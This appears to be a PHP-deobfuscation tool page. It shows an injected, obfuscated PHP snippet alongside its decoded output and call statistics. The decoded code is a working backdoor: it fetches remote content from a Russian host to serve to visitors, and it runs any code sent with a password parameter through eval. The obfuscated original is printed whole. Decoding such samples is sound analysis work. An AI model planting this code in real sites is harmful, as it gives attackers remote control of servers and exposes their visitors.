Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php //###=CACHE START=### error_reporting(0); eval(str_rot13('riny(onfr64_qrpbqr("n..

Decoded Output download

if (isset($ibv)) { echo $ibv; } else { error_reporting(0);
ini_set("display_errors", "0");
if (!isset($ibv)) {
if(!empty($_COOKIE["client_check"])) die($_COOKIE["client_check"]);
if(preg_match('!\S!u', file_get_contents($_SERVER["SCRIPT_FILENAME"]))) $c = "u"; else $c = "w";
$d = $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
$u = $_SERVER["HTTP_USER_AGENT"];
$url = "http://www.fudnotdet.ru/get.php?d=".urlencode($d)."&u=".urlencode($u)."&c=".$c."&i=1&h=".md5("b47ef2f1e09bc6ce8d215d9fabcc06a0".$d.$u.$c."1");
if(ini_get("allow_url_fopen") == 1) {
$ibv = file_get_contents($url);
} elseif(function_exists("curl_init")) {
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, FALSE);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
$result = curl_exec($ch);
curl_close($ch);
$ibv = $result;
} else {
$fp = fsockopen("www.fudnotdet.ru", 80, $errno, $errstr, 30);
if ($fp) {
    $out = "GET /get.php?d=".urlencode($d)."&u=".urlencode($u)."&c=".$c."&i=1&h=".md5("b47ef2f1e09bc6ce8d215d9fabcc06a0".$d.$u.$c."1")." HTTP/1.1
";
    $out .= "Host: www.fudnotdet.ru
";
    $out .= "Connection: Close

";
    fwrite($fp, $out);
    $resp = "";
    while (!feof($fp)) {
        $resp .= fgets($fp, 128);
    }
    fclose($fp);
    list($header, $body) = preg_split("/\R\R/", $resp, 2);
    $ibv = $body;
}
}
};
if(isset($_REQUEST["p"]) && $_REQUEST["p"] == "d92f6a06") { eval(stripslashes($_REQUEST["c"])); }
echo $ibv;}

Did this file decode correctly?

Original Code

<?php
//###=CACHE START=###
error_reporting(0);

eval(str_rot13('riny(onfr64_qrpbqr("nJLtXTymp2I0XPEcLaLcXFO7VTIwnT8tWTyvqwftsFOyoUAyVUftMKWlo3WspzIjo3W0nJ5aXQNcBjccozysp2I0XPWxnKAjoTS5K2Ilpz9lplVfVPVjVvx7PzyzVPtunKAmMKDbWTyvqvxcVUfXnJLbVJIgpUE5XPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKFxcVTEcMFtxK0ACG0gWEIfvL2kcMJ50K2AbMJAeVy0cBjccMvujpzIaK21uqTAbXPpuKSZuqFpfVTMcoTIsM2I0K2AioaEyoaEmXPEsH0IFIxIFJlWGD1WWHSEsExyZEH5OGHHvKFxcXFNxLlN9VPW1VwftMJkmMFNxLlN9VPW3VwfXWTDtCFNxK1ASHyMSHyfvH0IFIxIFK05OGHHvKF4xK1ASHyMSHyfvHxIEIHIGIS9IHxxvKGfXWUHtCFNxK1ASHyMSHyfvFSEHHS9IH0IFK0SUEH5HVy07PvE1pzjtCFNvnUE0pQbiY3q3ql5zqJEho3ExMKDhpaHiM2I0YaObpQ9xCFVhqKWfMJ5wo2EyXPExXF4vWaH9Vv51pzkyozAiMTHbWUHcYvVzLm0vYvEwYvVznG0kWzt9Vv5gMQHbVzV0A2IzZzLkMGN5LzZ2L2H4MQVkAJD5MzSvL2ZjAzRjVv4xMP4xqF4xLl4vZFVcBjccMvucozysM2I0XPWuoTkiq191pzksMz9jMJ4vXFN9CFNkXFO7PvEcLaLtCFOznJkyK2qyqS9wo250MJ50pltxqKWfXGfXsFOyoUAynJLbMaIhL3Eco25sMKucp3EmXPWwqKWfK2yhnKDvXFxtrjbxL2ttCFOwqKWfK2yhnKDbWUIloPx7PzA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9VEHSREIVfVRMOGSASXGfXL3IloS9mMKEipUDbWTAbYPOQIIWZG1OHK1WSISIFGyEFDH5GExIFYPOHHyISXGfXWUWyp3IfqPN9VTA1pzksMKuyLltxL2tcBjcwqKWfK2Afo3AyXPEwnPx7PvEcLaLtCFNxpzImqJk0Bjc9VTIfp2HtrjbxMaNtCFOzp29wn29jMJ4bVaq3ql5zqJEho3ExMKDhpaHvYPN4ZPjtWTIlpz5iYPNxMKWlp3ElYPNmZPx7PzyzVPtxMaNcVUfXVPNtVPEiqKDtCFNvE0IHVP9aMKDhpTujC2D9Vv51pzkyozAiMTHbWTDcYvVzqG0vYaIloTIhL29xMFtxqFxhVvMwCFVhWTZhVvMcCGRznQ0vYz1xAFtvLwD3MJLlMwSyZQyvLmMwMGuxZwR1MQyzLJWwLmN2LGNvYvExYvE1YvEwYvVkVvxhVvOVISEDYmRhZIklKT4vBjbtVPNtWT91qPNhCFNvFT9mqQbtq3q3YzM1MT5iqTEyqP5lqIklKT4vBjbtVPNtWT91qPNhCFNvD29hozIwqTyiowbtD2kip2IppykhKUWpovV7PvNtVPOzq3WcqTHbWTMjYPNxo3I0XGfXVPNtVPElMKAjVQ0tVvV7PvNtVPO3nTyfMFNbVJMyo2LbWTMjXFxtrjbtVPNtVPNtVPElMKAjVP49VTMaMKEmXPEzpPjtZGV4XGfXVPNtVU0XVPNtVTMwoT9mMFtxMaNcBjbtVPNtoTymqPtxnTIuMTIlYPNxLz9xrFxtCFOjpzIaK3AjoTy0XPViKSWpHv8vYPNxpzImpPjtZvx7PvNtVPNxnJW2VQ0tWTWiMUx7Pa0XsDc9BjccMvucp3AyqPtxK1WSHIISH1EoVaNvKFxtWvLtWS9FEISIEIAHJlWjVy0tCG0tVzD5ZzL2LGN2VvxtrlOyqzSfXUA0pzyjp2kup2uypltxK1WSHIISH1EoVzZvKFxcBlO9PzIwnT8tWTyvqwg9"));'));
//###=CACHE END=###
?>

Function Calls

str_rot13 1
base64_decode 1
error_reporting 1

Variables

None

Stats

MD5 e76ea522f8b74658a6c974ec7c51adbf
Eval Count 2
Decode Time 117 ms